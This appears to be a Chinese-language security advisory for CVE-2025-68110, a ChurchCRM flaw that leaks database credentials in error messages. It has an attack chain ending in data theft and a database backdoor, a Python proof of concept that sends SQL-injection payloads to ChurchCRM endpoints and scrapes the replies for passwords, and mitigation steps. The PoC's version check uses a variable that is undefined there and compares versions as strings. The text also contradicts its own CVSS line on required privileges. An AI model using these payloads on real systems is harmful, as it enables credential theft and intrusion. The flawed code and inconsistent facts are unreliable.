ChurchCRM < 6.5.3 数据库敏感信息泄露漏洞 (CVE-2025-68110)

漏洞信息

漏洞编号

CVE-2025-68110

漏洞类型

信息泄露

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ChurchCRM

漏洞概述

ChurchCRM是一款开源的教堂管理系统，广泛用于教会组织管理信徒信息、财务记录、活动安排等敏感数据。该系统存在一个严重的信息泄露漏洞，在6.5.3之前的版本中，当系统发生错误时，错误消息可能会暴露数据库连接相关的敏感信息，包括数据库主机地址、IP地址、数据库用户名以及数据库密码等关键凭据信息。攻击者无需特殊权限即可触发该漏洞，通过构造特定的请求或利用系统功能模块触发错误条件，即可获取数据库连接凭证。获取到数据库凭据后，攻击者可以直接连接数据库服务器，访问、篡改或删除教会管理系统中存储的所有敏感数据，包括信徒个人信息、捐赠记录、财务数据等。这种信息泄露可能导致严重的隐私侵害和数据安全风险，对教会组织和其成员的利益造成重大损害。

技术细节

该漏洞属于敏感数据意外泄露类型，源于ChurchCRM系统在错误处理机制中对敏感信息的安全控制不足。具体来说，当系统执行数据库操作时，如果遇到异常情况（如SQL语法错误、连接超时、查询失败等），PHP的错误处理机制会将详细的错误信息返回给客户端。在错误消息中，系统直接输出了数据库连接字符串的组成部分，包括但不限于：数据库主机名（如localhost或远程IP）、数据库端口、数据库用户名、数据库密码等敏感认证信息。攻击者可以通过多种方式触发错误条件，例如：发送格式异常的请求参数、利用现有功能模块的边界条件、或者在未授权情况下访问特定功能点。由于该系统在错误处理时未对敏感信息进行脱敏处理，攻击者能够逐步收集数据库基础设施信息，为后续的数据库入侵攻击奠定基础。漏洞的严重性在于攻击门槛低、影响范围广，且泄露的数据库凭据可能具有较高的权限。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描互联网或内部网络上的ChurchCRM实例，识别运行版本

STEP 2

步骤2

漏洞探测：攻击者访问系统各个功能模块，发送异常请求参数触发数据库错误

STEP 3

步骤3

信息收集：分析返回的错误消息，提取数据库主机、端口、用户名、密码等敏感信息

STEP 4

步骤4

数据库连接：利用收集到的凭据直接连接目标数据库服务器

STEP 5

步骤5

数据窃取：访问、导出或窃取数据库中存储的信徒个人信息、捐赠记录、财务数据

STEP 6

步骤6

持久化控制：在数据库中植入后门或修改数据，确保持续访问和控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-68110 PoC - ChurchCRM Database Information Disclosure
# This PoC demonstrates triggering error conditions to leak database credentials

import requests
import re
from urllib.parse import quote

TARGET_URL = "http://target-churchcrm.com/ChurchCRM"

def test_database_info_disclosure():
    """Test for database information disclosure vulnerability"""
    
    # Test endpoints that may trigger database errors
    test_endpoints = [
        "/FindIndividual.php?Search=1&AJAX_request=true",
        "/PersonEditor.php?PersonID=' OR 1=1 --",
        "/api/persons?search=test' AND SLEEP(5) --",
        "/FinancialReports.php?report=invalid",
    ]
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
    }
    
    print("[*] Testing ChurchCRM for database info disclosure...")
    
    for endpoint in test_endpoints:
        try:
            url = TARGET_URL + endpoint
            response = requests.get(url, headers=headers, timeout=10, verify=False)
            
            # Search for database connection information in response
            db_info_patterns = [
                r'(mysql|postgresql|sqlite):[^\s]+',  # Database connection strings
                r'localhost[:\d]*',                     # Host information
                r'user[=:]\s*\w+',                      # Username hints
                r'password[=:]\s*\S+',                  # Password hints
                r'Database.*?error',
                r'SQLSTATE.*?\d+',
                r'MySQL.*?error',
                r'Connection.*?failed'
            ]
            
            for pattern in db_info_patterns:
                matches = re.findall(pattern, response.text, re.IGNORECASE)
                if matches:
                    print(f"[!] Potential database info found at {endpoint}:")
                    for match in matches:
                        print(f"    {match}")
                        
        except requests.exceptions.RequestException as e:
            print(f"[-] Error testing {endpoint}: {e}")

def check_version():
    """Check if target is vulnerable version"""
    try:
        response = requests.get(TARGET_URL + "/SystemSettings.php", headers=headers, timeout=10)
        if "version" in response.text.lower():
            version_match = re.search(r'version[:\s]*([\d.]+)', response.text, re.IGNORECASE)
            if version_match:
                version = version_match.group(1)
                print(f"[*] Detected ChurchCRM version: {version}")
                if version < "6.5.3":
                    print("[!] Target is potentially vulnerable")
    except:
        pass

if __name__ == "__main__":
    test_database_info_disclosure()
    check_version()

影响范围

ChurchCRM < 6.5.3

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 修改php.ini配置文件，将display_errors设置为Off，log_errors设置为On，将错误信息记录到安全日志文件而非页面输出；2) 检查数据库账户权限，撤销不必要的权限，限制数据库用户只能访问必要的数据库；3) 在Web服务器层面配置，拦截包含SQL特殊字符的请求参数；4) 启用数据库审计日志，监控异常查询行为；5) 临时限制公网访问ChurchCRM系统，仅允许受信任的IP访问管理后台。